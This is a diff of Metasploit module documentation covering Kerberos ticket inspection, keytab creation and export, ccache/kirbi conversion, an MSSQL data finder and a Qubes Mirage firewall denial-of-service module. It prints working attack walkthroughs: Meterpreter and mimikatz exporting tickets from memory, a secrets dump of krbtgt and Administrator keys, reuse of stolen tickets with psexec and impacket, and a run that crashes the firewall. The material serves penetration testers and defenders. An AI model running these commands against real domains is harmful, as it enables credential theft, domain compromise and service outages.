+	   Start/End/MaxRenew: 1/12/2023 7:41:41 PM ; 1/13/2023 5:37:45 AM ; 1/1/1601 12:00:00 AM
+	   Service Name (02) : LDAP ; DC3 ; @ DEMO.LOCAL
+	   Target Name  (--) : @ DEMO.LOCAL
+	   Client Name  (01) : DC3$ ; @ DEMO.LOCAL
+	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
+	   Session Key       : 0x00000012 - aes256_hmac
+	     ab64d555f18de6a3262d921e6dc75dcf884852f551db3114f7983dbaf276e1d6
+	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 7	[...]
+====================
+Base64 of file : [0;154242]-1-0-40a50000-DC3$@LDAP-DC3.kirbi
+====================
+doQAAAYXMIQAAAYRoIQAAAADAgEFoYQAAAADAgEWooQAAAS2MIQAAASwYYQAAASq
+MIQAAASkoIQAAAADAgEFoYQAAAAMGwpBREYzLkxPQ0FMooQAAAAmMIQAAAAgoIQA
+AAADAgECoYQAAAARMIQAAAALGwRMREFQGwNEQzOjhAAABFcwhAAABFGghAAAAAMC
+... etc...
+====================
+```
+
+Note that tools often Base64 encode the Kirbi content to display to the user. However the `inspect_ticket` module expects
+the input file to be in binary format. To convert base64 strings to binary files:
+
+```
+# Linux
+cat ticket.b64 | base64 -d > ticket.kirbi
+
+# Mac
+cat ticket.b64 | base64 -D > ticket.kirbi
+
+# Powershell
+[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
+```
+
+## Module usage
+
+1. Start msfconsole
+2. Do: `use auxiliary/admin/kerberos/inspect_ticket`
+3. Do: `set TICKET_PATH /path/to/ccache/file`
+4. Optional: either `set AES_KEY aes_key_here` or `set NTHASH nthash_here` - which will attempt to decrypt tickets
+5. Do: `run` to see the contents of the ticket
+
+## Scenarios
+
+### Inspecting Ticket contents
+
+This action allows you to see the contents of any ccache or kirbi file,
+If you are able to provide the decryption key we can also show the encrypted parts of the tickets.
+
+1. `TICKET_PATH` - The path to the ccache or kirbi file.
+2. `AES_KEY` - (Optional) Only set this if you have the decryption key and it is an AES128 or AES256 key.
+3. `NTHASH` - (Optional) Only set this if you have the decryption key and it is an NTHASH.
+No other options are used in this action.
+
+**Without Key**
+
+```
+msf6 auxiliary(admin/kerberos/inspect_ticket) > run TICKET_PATH=/path/to/ticket
+Primary Principal: Administrator@WINDOMAIN.LOCAL
+Ccache version: 4
+
+Creds: 1
+  Credential[0]:
+    Server: cifs/dc.windomain.local@WINDOMAIN.LOCAL
+    Client: Administrator@WINDOMAIN.LOCAL
+    Ticket etype: 18 (AES256)
+    Key: 3436643936633032656264663030393931323461366635653364393932613763
+    Ticket Length: 978
+    Subkey: false
+    Addresses: 0
+    Authdatas: 0
+    Times:
+      Auth time: 2022-11-21 13:52:00 +0000
+      Start time: 2022-11-21 13:52:00 +0000
+      End time: 2032-11-18 13:52:00 +0000
+      Renew Till: 2032-11-18 13:52:00 +0000
+    Ticket:
+      Ticket Version Number: 5
+      Realm: WINDOMAIN.LOCAL
+      Server Name: cifs/dc.windomain.local
+      Encrypted Ticket Part:
+        Ticket etype: 18 (AES256)
+        Key Version Number: 2
+        Cipher:
+          1YrnB+fhzeLEq+4NUcXvoEsSI29+gwCDg3qjYdb0YHhqx23BhZGOK9rIQ99uXeuLHSapJAanCE9g/PyyKDE1kggrEHfy6cxwsP25exmN2w3NXVm7P0PqMVON2RBp2S11eIdF/Zibhrs7JbaaVw0Hv8GpbpHdFI0l6Xx3Jz+y0bqFsFNEsU8nEW35Z3Oo2xpI/xTwNTyG1Bmg+bktSLyI6nEPtJXQKcoJTrNhSBNsZ18HZiUPim9EqSCHUh0VbDeLntryh+lt0TIgwhwipHPWnro+Y81dvX5j8ZeBdgKgnoX3jciU629u/RveQJgyw/vLk1KT0RzTbHSwdRk/xi6ghccvew33TKJ8q3nP/JuSWDzaDE6I6v3KgInSZP+XkCAV5VT//U49MtIVIKARcmtXQwVxztMXKlWjIaxQwl9BN6CuyWZjDcafAssjPWgWIAsesmEWHn3btv1BP0a4gvn5f1b7Fu4Gh6w0ARCryxZkSl+6UhJbcdaRT23WhqN24ECGEl0VIX4fuLs6x0gVtAQ2YsI+HkoQYuI+C28gXzJUCac6rJyFQSTsciwj/jVf18ttw1vfGGKa/BVcqscGZoJPpBiuGPBkIbeAOery0Sjn+0tP0tsPYw1OkpzZ7n/j/YdmTX6UAFZjCLbgvF8hoPyider1gntOiSjlLlEUITLTfe5zqWi4gs47Ly6lvggBWW9Yg0fIaPOHYMvsszMLcJz0+dFXtDVI452LIEatLDvp1aKkwGANWYyRgOMlHR3fD030SOTNEb5oa6WigWZQLlhuDbgrfFaWWAMp7opcNbNKy7Iv17EscL7pW2Ygc38VbmbFtdIfvpQ9niwLr2msjzhB7RPihZXcUAlVygLwykq0JDG4fRmoNXzNydbnYlX9E+KW0fHFjoBitAx1xrp9p5Ajwoyy+wIk0mt/aC4pbfcoRjt4GUF/9DhZnH3HiPn4lM9TLMzpiediEtDZtKgGvAAP2cJZn2gsLRlKAtBZvl+ibe1uDzC9g6rnObAx3c+OSG9rmHzBBCq6D8wW6ZjrQy8njNuriC5rnQxUpVhgGvTOkeTphSIHX+D4SuMd+XZ4zqa3DsrHzIeVWAvrTHCDBzy+DKt2RoQTwYmGT+a0YB0btQtgIfRj2OwDtlP65JUxC+/ANelHg73d0REoYistB5ZMmvk=
+```
+
+**With Key**
+
+```
+msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
+Primary Principal: Administrator@WINDOMAIN.LOCAL
+Ccache version: 4
+
+Creds: 1
+  Credential[0]:
+    Server: cifs/dc.windomain.local@WINDOMAIN.LOCAL
+    Client: Administrator@WINDOMAIN.LOCAL
+    Ticket etype: 18 (AES256)
+    Key: 3436643936633032656264663030393931323461366635653364393932613763
+    Ticket Length: 978
+    Subkey: false
+    Addresses: 0
+    Authdatas: 0
+    Times:
+      Auth time: 2022-11-21 13:52:00 +0000
+      Start time: 2022-11-21 13:52:00 +0000
+      End time: 2032-11-18 13:52:00 +0000
+      Renew Till: 2032-11-18 13:52:00 +0000
+    Ticket:
+      Ticket Version Number: 5
+      Realm: WINDOMAIN.LOCAL
+      Server Name: cifs/dc.windomain.local
+      Encrypted Ticket Part:
+        Ticket etype: 18 (AES256)
+        Key Version Number: 2
+        Decrypted (with key: \x4b\x91\x2b\xe0\x36\x6a\x6f\x37\xf4\xa7\xd5\x71\xbe\xe1\x8b\x11\x73\xd9\x31\x95\xef\x76\xf8\xd1\xe3\xe8\x1e\xf6\x17\x2a\xb3\x26):
+          Times:
+            Auth time: 2022-11-21 13:52:00 UTC
+            Start time: 2022-11-21 13:52:00 UTC
+            End time: 2032-11-18 13:52:00 UTC
+            Renew Till: 2032-11-18 13:52:00 UTC
+          Client Addresses: 0
+          Transited: tr_type: 0, Contents: ""
+          Client Name: 'Administrator'
+          Client Realm: 'WINDOMAIN.LOCAL'
+          Ticket etype: 18 (AES256)
+          Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763
+          Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)
+          PAC:
+            Validation Info:
+              Logon Time: 2022-11-21 13:52:00 +0000
+              Logoff Time: Never Expires (inf)
+              Kick Off Time: Never Expires (inf)
+              Password Last Set: No Time Set (0)
+              Password Can Change: No Time Set (0)
+              Password Must Change: Never Expires (inf)
+              Logon Count: 0
+              Bad Password Count: 0
+              User ID: 500
+              Primary Group ID: 513
+              User Flags: 0
+              User Session Key: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
+              User Account Control: 528
+              Sub Auth Status: 0
+              Last Successful Interactive Logon: No Time Set (0)
+              Last Failed Interactive Logon: No Time Set (0)
+              Failed Interactive Logon Count: 0
+              SID Count: 0
+              Resource Group Count: 0
+              Group Count: 5
+              Group IDs:
+                Relative ID: 513, Attributes: 7
+                Relative ID: 512, Attributes: 7
+                Relative ID: 520, Attributes: 7
+                Relative ID: 518, Attributes: 7
+                Relative ID: 519, Attributes: 7
+              Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369
+              Effective Name: 'Administrator'
+              Full Name: ''
+              Logon Script: ''
+              Profile Path: ''
+              Home Directory: ''
+              Home Directory Drive: ''
+              Logon Server: ''
+              Logon Domain Name: 'WINDOMAIN.LOCAL'
+            Client Info:
+              Name: 'Administrator'
+              Client ID: 2022-11-21 13:52:00 +0000
+            Pac Server Checksum:
+              Signature: \x04\xe5\xab\x06\x1c\x7a\x90\x9a\x26\xb1\x22\xc2
+            Pac Privilege Server Checksum:
+              Signature: \x71\x0b\xb1\x83\x85\x82\x57\xf4\x10\x21\xbd\x7e
+```
+
+Both of these examples are printing the contents of the same ccache file and showing the difference in output if you have the decryption key available.
@@ -0,0 +1,199 @@
+## Keytab
+
+The `modules/auxiliary/admin/kerberos/keytab` module provides utilities for interacting with MIT keytab files, which can
+store the hashed passwords of one or more principals.
+
+Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced
+offline.
+
+Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,
+including the krbtgt encrypted blobs if the AES256 password hash is used - which is described in more detail below.
+
+## Actions
+
+The following actions are supported:
+
+1. **LIST** - List the entries in the keytab file [Default]
+2. **ADD** - Add a new entry to the keytab file
+3. **EXPORT** - Export known Kerberos encryption keys from the database
+
+## Scenarios
+
+### List
+
+```
+msf6 auxiliary(admin/kerberos/keytab) > run keytab_file=./example.keytab
+
+Keytab entries
+==============
+
+ kvno  type         principal                 hash                                                              date
+ ----  ----         ---------                 ----                                                              ----
+ 1     18 (AES256)  Administrator@ADF3.LOCAL  56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01  1970-01-01 01:00:00 +0100
+
+[*] Auxiliary module execution completed
+```
+
+### Add
+
+Adding an entry using a known password hash/key which has been extracted from a Domain Controller - for instance by using the `auxiliary/gather/windows_secrets_dump` module:
+
+```
+msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=krbtgt realm=DEMO.LOCAL enctype=AES256 key=e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
+
+[*] modifying existing keytab
+[+] keytab entry added to ./example.keytab
+```
+
+Adding entries using a specified password:
+
+```
+msf6 auxiliary(admin/kerberos/keytab) > run action=ADD keytab_file=./example.keytab principal=Administrator realm=DEMO.LOCAL enctype=ALL password=p4$$w0rd
+
+[*] modifying existing keytab
+[*] Generating key with salt: DEMO.LOCALAdministrator. The SALT option can be set manually
+[+] keytab entry added to ./example.keytab
+```
+
+### Export
+
+Export Kerberos encryption keys stored in the Metasploit database to a keytab file. This functionality is useful in conjunction with secrets dump
+
+```
+# Secrets dump
+msf6 > use auxiliary/gather/windows_secrets_dump
+msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
+... ommitted ...
+# Kerberos keys:
+Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01
+Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea
+Administrator:des-cbc-md5:ad49d9d92f5da170
+Administrator:des-cbc-crc:ad49d9d92f5da170
+krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
+krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da
+krbtgt:des-cbc-md5:3ddf2f627c4cbcdc
+... ommitted ...
+[*] Auxiliary module execution completed
+
+# Export to keytab
+msf6 auxiliary(gather/windows_secrets_dump) > use admin/kerberos/keytab
+msf6 auxiliary(admin/kerberos/keytab) > run action=EXPORT keytab_file=./example.keytab
+[+] keytab saved to ./example.keytab
+Keytab entries
+==============
+
+ kvno  type              principal                                   hash                                                              date
+ ----  ----              ---------                                   ----                                                              ----
+ 1     1  (DES_CBC_CRC)  WIN11-DC3$@adf3.local                       3e5d83fe4594f261                                                  1970-01-01 01:00:00 +0100
+ 1     17 (AES128)       ADF3\DC3$@adf3.local                        967ccd1ffb9bff7900464b6ea383ee5b                                  1970-01-01 01:00:00 +0100
+ 1     3  (DES_CBC_MD5)  ADF3\DC3$@adf3.local                        62336164643537303830373630643133                                  1970-01-01 01:00:00 +0100
+ 1     18 (AES256)       Administrator@adf3.local                    56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01  1970-01-01 01:00:00 +0100
+ 1     17 (AES128)       Administrator@adf3.local                    df990c21c4e8ea502efbbca3aae435ea                                  1970-01-01 01:00:00 +0100
+ 1     3  (DES_CBC_MD5)  Administrator@adf3.local                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
+ 1     1  (DES_CBC_CRC)  Administrator@adf3.local                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
+ 1     18 (AES256)       krbtgt@adf3.local                           e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c  1970-01-01 01:00:00 +0100
+ 1     17 (AES128)       krbtgt@adf3.local                           ba87b2bc064673da39f40d37f9daa9da                                  1970-01-01 01:00:00 +0100
+ 1     3  (DES_CBC_MD5)  krbtgt@adf3.local                           3ddf2f627c4cbcdc                                                  1970-01-01 01:00:00 +0100
+... ommitted ...
+[*] Auxiliary module execution completed
+```
+
+### Decrypting Kerberos traffic in wireshark
+
+The Kerberos protocol makes use of encrypted values which will show as an opaque blob of hex characters in Wireshark.
+Configuring Wireshark with a Keytab file can decrypt these values automatically.
+
+For instance in a TGS-REQ request within Wireshark, the `cipher` below is encrypted using the user account's password and
+is not human readable:
+
+```
+tgs-req
+  pvno: 5
+  msg-type: krb-tgs-req (12)
+  padata: 1 item
+    PA-DATA pA-TGS-REQ
+      padata-type: pA-TGS-REQ (1)
+        padata-value: 6e82044730820443a003020105a10302010ea20703050000000000a38203c6618203c230…
+          ap-req
+            pvno: 5
+            msg-type: krb-ap-req (14)
+            Padding: 0
+            ap-options: 00000000
+            ticket
+            authenticator
+              etype: eTYPE-ARCFOUR-HMAC-MD5 (23)
+              cipher: 0bbb6dbc29413df5905d45c97a3d05239bd609326ff4a410f47048c3f4e22c3ea8003985…
+                      ^^^^^^^^^^^^^^ Value encrypted using the user account's password
+```
+
+The easiest way to decrypt these opaque blobs is to generate a Keytab file with Metasploit using the secretsdump scenario above or similar.
+After generating a keytab file in the Wireshark GUI go to `Edit -> Preferences -> Protocols -> KRB5` and modify the following options:
+- Set `try to decrypt Kerberos blobs` to true
+- Set the `Kerebros keytab file` to the keytab file generated by your domain controller
+
+After confirming the new settings - the previously encrypted which were signed with the user's password, and the decryptable session key
+should be viewable in Wireshark.
+
+For example the previous TGS-REQ authenticator blob is now decrypted in the Wireshark UI. Wireshark on Linux may not show
+the decrypted packet information in the packet details pane, instead it appears as a separate tab in the packet bytes pane:
+
+
+```
+tgs-req
+  pvno: 5
+  msg-type: krb-tgs-req (12)
+  padata: 1 item
+    PA-DATA pA-TGS-REQ
+      padata-type: pA-TGS-REQ (1)
+        padata-value: 6e82044730820443a003020105a10302010ea20703050000000000a38203c6618203c230…
+          ap-req
+            pvno: 5
+            msg-type: krb-ap-req (14)
+            Padding: 0
+            ap-options: 00000000
+            ticket
+            authenticator
+              etype: eTYPE-ARCFOUR-HMAC-MD5 (23)
+              cipher: 0bbb6dbc29413df5905d45c97a3d05239bd609326ff4a410f47048c3f4e22c3ea8003985…
+                Decrypted keytype 23 usage 7 using learnt encASRepPart_key in frame 475 (id=475.1 same=0) (f161f360...)
+                  # ...
+                authenticator
+                  authenticator-vno: 5
+                  crealm: ADF3.LOCAL
+                  cname
+                    name-type: kRB5-NT-PRINCIPAL (1)
+                    cname-string: 1 item
+                      CNameString: a
+                  cusec: 303247
+                  ctime: 2022-04-10 15:21:31 (UTC)
+                  ^^^^^^^^^^^^^^ authenticator value now decrypted using the previously generated keytab file
+```
+
+If you have exported the `krbtgt` account to the keytab file - Wireshark will also decrypt the TGT ticket itsel. If not - Wireshark
+will generate warnings about being unable to decrypt the TGT ticket which is signed using the krbtgt account.
+
+Additional details: https://wiki.wireshark.org/Kerberos
+
+If you are on a Windows domain controller it is possible to use the `ktpass` program to generate keytab files: 
+
+```
+ktpass /crypto All /princ Administrator@DEMO.LOCAL /pass p4$$w0rd /out demo.keytab /ptype KRB5_NT_PRINCIPAL
+```
+
+It is easier to use the Metasploit module, but if you do use ktpass - be aware of the following issues:
+- If the password contains `$` it is easier to run the `ktpass` command in `cmd` rather than `powershell` to avoid unexpected variable substitution
+- If there is a `Missing keytype 18` warning for `etype: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)` in Wireshark - verify that the principal name is correct within the ktpass generation command
+  - This should match the initial AS-REQ KRB ERROR salt, found in `krb-error` -> `edata` -> `ETYPE-INFO2-ENTRY` -> `salt`
+
+### Common Mistakes
+
+**Invalid REALM/PRINCIPAL/SALT**
+
+When generating a keytab with a password, a salt is generated by default from the principal and realm unless one is explicitly provided.
+For Windows Active Directory environments, these values are case-sensitive. The realm should be upper case, and the principal is case-sensitive.
+
+When the SALT is not explicitly provided a salt will be generated that follows the Windows naming convention, for instance:
+
+```
+REALM.EXAMPLEAdministrator
+```
@@ -0,0 +1,141 @@
+## Converting Kerberos Tickets
+
+The `auxiliary/admin/kerberos/ticket_converter` module is used to convert from a ccache file format to the kirbi file format and vice versa.
+The main reason you may want to convert between these file types is for use in different tools.
+For example mimikatz will create tickets for you in the kirbi format but to use that in another tool
+like Metasploit or Impacket you need to convert it to the ccache format first.
+
+## Acquiring tickets
+
+Kerberos tickets can be acquired from multiple sources. For instance:
+
+- Retrieved directly from the KDC with the `get_ticket` module
+- Forged using the `forge_ticket` module after compromising the krbtgt or a service account's encryption keys
+- Extracted from memory using Meterpreter and mimikatz:
+
+```
+meterpreter > load kiwi
+Loading extension kiwi...
+  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
+ .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
+ ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+ ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
+ '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
+  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
+
+Success.
+
+meterpreter > kiwi_cmd "sekurlsa::tickets /export"
+
+Authentication Id : 0 ; 1393218 (00000000:00154242)
+Session           : Network from 0
+User Name         : DC3$
+Domain            : DEMO
+Logon Server      : (null)
+Logon Time        : 1/12/2023 9:11:00 PM
+SID               : S-1-5-18
+
+	 * Username : DC3$
+	 * Domain   : DEMO.LOCAL
+	 * Password : (null)
+
+	Group 0 - Ticket Granting Service
+
+	Group 1 - Client Ticket ?
+	 [00000000]
+	   Start/End/MaxRenew: 1/12/2023 7:41:41 PM ; 1/13/2023 5:37:45 AM ; 1/1/1601 12:00:00 AM
+	   Service Name (02) : LDAP ; DC3 ; @ DEMO.LOCAL
+	   Target Name  (--) : @ DEMO.LOCAL
+	   Client Name  (01) : DC3$ ; @ DEMO.LOCAL
+	   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
+	   Session Key       : 0x00000012 - aes256_hmac
+	     ab64d555f18de6a3262d921e6dc75dcf884852f551db3114f7983dbaf276e1d6
+	   Ticket            : 0x00000012 - aes256_hmac       ; kvno = 7	[...]
+====================
+Base64 of file : [0;154242]-1-0-40a50000-DC3$@LDAP-DC3.kirbi
+====================
+doQAAAYXMIQAAAYRoIQAAAADAgEFoYQAAAADAgEWooQAAAS2MIQAAASwYYQAAASq
+MIQAAASkoIQAAAADAgEFoYQAAAAMGwpBREYzLkxPQ0FMooQAAAAmMIQAAAAgoIQA
+AAADAgECoYQAAAARMIQAAAALGwRMREFQGwNEQzOjhAAABFcwhAAABFGghAAAAAMC
+... etc...
+====================
+```
+
+Note that tools often Base64 encode the Kirbi content to display to the user. However the `inspect_ticket` module expects
+the input file to be in binary format. To convert base64 strings to binary files:
+
+```
+# Linux
+cat ticket.b64 | base64 -d > ticket.kirbi
+
+# Mac
+cat ticket.b64 | base64 -D > ticket.kirbi
+
+# Powershell
+[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
+```
+
+## Module usage
+
+1. Start msfconsole
+2. Do: `use auxiliary/admin/kerberos/ticket_converter`
+3. Do: `set InputPath /path/to/ccache/or/kirbi/file`
+4. Do: `set OutputPath /path/to/save/your/converted/file`
+5. Do: `run`
+6. You should see output similar to:
+   ```
+   [*] [2022.12.16-12:52:56] Converting from ccache to kirbi
+   [*] [2022.12.16-12:52:56] File written to <OutputPath>
+   [*] Auxiliary module execution completed
+   ```
+7. Your converted ticket which will have been stored at `OutputPath`
+8. Example usage in Metasploit:
+   ```
+   use windows/smb/psexec
+   run rhost=192.168.123.13 username=Administrator domaincontrollerrhost=192.168.123.1 smb::auth=kerberos smb::rhostname=host.demo.local smbdomain=demo.local smbkrb5ccname=/path/to/ccache/ticket 
+   ```
+9. Example usage in impacket:
+   ```
+   export KRB5CCNAME=/path/to/ccache/ticket
+   python3 mssqlclient.py DW.LOCAL/fake_mysql@dc1.dw.local -k -no-pass
+   ```
+10. You may use the `inspect_ticket` module to prints the contents of the ccache/kirbi file:
+   `use auxiliary/admin/kerberos/inspect_ticket`
+
+## Scenarios
+
+### You have a ccache file
+
+If you have a ccache file, for example by forging it using the `auxiliary/admin/kerberos/forge_ticket` module,
+but need a file in the kirbi format which is commonly used by mimikatz.
+
+Set the `InputPath` to the location of your ccache file, specify your desired output location with `OutputPath` and `run`.
+Metasploit will automatically detect the file type so there's no need to tell msfconsole whether it's a ccache or kirbi file.
+
+Example:
+```
+msf6 auxiliary(admin/kerberos/ticket_converter) > run inputpath=metasploit_ticket.ccache outputpath=metasploit_ticket.kirbi
+
+[*] [2023.01.05-17:01:02] Converting from ccache to kirbi
+[*] [2023.01.05-17:01:02] File written to /Users/dwelch/dev/metasploit-framework/metasploit_ticket.kirbi
+[*] Auxiliary module execution completed
+```
+
+### You have a kirbi file
+
+The other scenario is if you have a kirbi file, for example tools such as mimikatz will give you tickets in the kirbi format,
+and you need a ccache for use with another tool such as Metasploit and Impacket.
+
+The steps are exactly the same for a kirbi file as they are for a ccache as Metasploit will automatically detect the input file type.
+
+Set the `InputPath` to the location of your ccache file, specify your desired output location with `OutputPath` and `run`.
+Metasploit will automatically detect the file type so there's no need to tell msfconsole whether it's a ccache or kirbi file.
+
+Example:
+```
+msf6 auxiliary(admin/kerberos/ticket_converter) > run inputpath=metasploit_ticket.kirbi outputpath=metasploit_ticket.ccache
+
+[*] [2023.01.05-17:01:39] Converting from kirbi to ccache
+[*] [2023.01.05-17:01:39] File written to /Users/dwelch/dev/metasploit-framework/metasploit_ticket.ccache
+[*] Auxiliary module execution completed
+```
@@ -2,6 +2,46 @@

 This (Interesting Data Finder) module will connect to a remote MSSQL server using a given set of credentials and search for rows and columns with "interesting" names. This information can help you fine-tune further attacks against the database.

+### Setup
+
+Install MSSQL server on a windows machine.
+
+Set up an example database and table with interesting columns:
+
+```tsql
+USE [master];
+
+-- Drop and create a new example database if it exists
+GO
+IF DB_ID (N'example_database') IS NOT NULL
+    DROP DATABASE [example_database];
+GO
+CREATE DATABASE [example_database];
+GO
+
+-- Use the new database
+
+USE [example_database];
+GO
+
+-- Create an interesting table
+CREATE TABLE [example_table] (
+    ExampleId INT NOT NULL PRIMARY KEY,
+    Username NVARCHAR(255),
+    Email NVARCHAR(255),
+    Password NVARCHAR(255),
+    BankCreditCard NVARCHAR(255)
+);
+GO
+
+-- Create interesting data
+INSERT INTO [example_table] (ExampleId, Username, Email, Password, BankCreditCard)
+VALUES
+    (1, 'username-1', 'email-1', 'password-1', 'bank-credit-card-1'),
+    (2, 'username-2', 'email-2', 'password-2', 'bank-credit-card-2');
+GO
+```
+
 ## Verification Steps

 1. Do: ```use auxiliary/admin/mssql/mssql_idf```
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+The following versions of qubes-mirage-firewall (aka Mirage firewall for
+QubesOS)
+
+- 0.8.0 (588e921b9d78a99f6f49d468a7b68284c50dabeba95698648ea52e99b381723b)
+- 0.8.1 (d0ec19d5b392509955edccf100852bcc9c0e05bf31f1ec25c9cc9c9e74c3b7bf)
+- 0.8.2 (73488b0c54d6c43d662ddf58916b6d472430894f6394c6bdb8a879723abcc06f)
+- 0.8.3 (f499b2379c62917ac32854be63f201e6b90466e645e54dea51e376baccdf26ab)
+
+Vulnerable versions can be downloaded from
+https://github.com/mirage/qubes-mirage-firewall/releases
+Installation instruction is available at
+https://github.com/mirage/qubes-mirage-firewall/blob/609f5295c7b315886244426b685807244c7dbe81/README.md#deploy
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use use auxiliary/dos/mirageos/qubes_mirage_firewall_dos`
+1. Do: `run`
+1. You should crash Mirage firewall
+
+## Options
+
+By default `RHOST` and `RPORT` are randomly chosen, but user can set arbitrary values.
+
+### RHOST
+
+`RHOST` should be in range of 239.255.0.0 to 239.255.255.255.
+
+### RPORT
+
+`RPORT` can be any value from 0 to 65535.
+
+## Scenarios
+
+Demo of the module is use is available at https://youtu.be/x3_vT1BcyOM
+
+### Version and OS
+
+Tested on Qubes release 4.1.1 (R4.1), with Mirage firewall version 0.8.3 build with Solo5 version 0.7.4.
@@ -45,7 +45,7 @@ msf6 auxiliary(gather/kerberos_enumusers) > run rhost=192.168.123.228 domain=dom
 msf6 auxiliary(gather/kerberos_enumusers) > 
 ```

-### ASREPRoast Cracking
+### ASREPRoasting

 Accounts that have `Do not require Kerberos preauthentication` enabled, will receive an ASREP response with a ticket present.
 The technique of cracking this token offline is called ASREPRoasting.
@@ -1,5 +1,5 @@
 ## Vulnerable Application
-This module allows users to query a LDAP server for vulnerable certificate
+The `auxiliary/gather/ldap_esc_vulnerable_cert_finder` module allows users to query a LDAP server for vulnerable certificate
 templates and will print these certificates out in a table along with which
 attack they are vulnerable to and the SIDs that can be used to enroll in that
 certificate template.
@@ -11,8 +11,8 @@ perform this enrollment operation.

 Currently the module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates.

-### Installing ADCS
-1. Install ADCS on either a new or existing domain controller
+### Installing AD CS
+1. Install AD CS on either a new or existing domain controller
 1. Open the Server Manager
 1. Select Add roles and features
 1. Select "Active Directory Certificate Services" under the "Server Roles" section
@@ -77,7 +77,8 @@ Currently the module is capable of checking for ESC1, ESC2, and ESC3 vulnerable
 1. Scroll down and select the `ESC3-Template2` certificate, and select `OK`.
 1. The certificate should now be available to be issued by the CA server.

-## Verification Steps
+## Module usage
+
 1. Do: Start msfconsole
 1. Do: `use auxiliary/gather/ldap_esc_vulnerable_cert_finder`
 1. Do: `set BIND_DN <DOMAIN>\\<USERNAME to log in as>`
@@ -96,9 +97,9 @@ that are both vulnerable and enrollable.

 ## Scenarios

-### Windows Server 2022 with ADCS
+### Windows Server 2022 with AD CS
 ```
-msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder 
+msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
 RHOST => 172.26.104.157
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_DN DAFOREST\\Administrator
@@ -115,8 +116,7 @@ Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
   BIND_DN               DAFOREST\Administrator  no        The username to authenticate to LDAP server
   BIND_PW               theAdmin123             no        Password for the BIND_DN
   REPORT_NONENROLLABLE  false                   yes       Report nonenrollable certificate templates
-   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
-                                                           Metasploit
+   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 389                     yes       The target port
   SSL                   false                   no        Enable SSL on the LDAP connection

@@ -234,10 +234,10 @@ msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
 [*]          Enrollment SIDs:
 [*]             * S-1-5-11 (Authenticated Users)
 [*] Auxiliary module execution completed
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > 
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
 ```

-### Windows Server 2022 with ADCS and REPORT_NONENROLLABLE Set To TRUE
+### Windows Server 2022 with AD CS and REPORT_NONENROLLABLE Set To TRUE
 ```
 msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
@@ -258,8 +258,7 @@ Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
   BIND_DN               DAFOREST\Administrator  no        The username to authenticate to LDAP server
   BIND_PW               theAdmin123             no        Password for the BIND_DN
   REPORT_NONENROLLABLE  true                    yes       Report nonenrollable certificate templates
-   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
-                                                           Metasploit
+   RHOSTS                172.26.104.157          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 389                     yes       The target port
   SSL                   false                   no        Enable SSL on the LDAP connection

@@ -449,5 +448,5 @@ msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
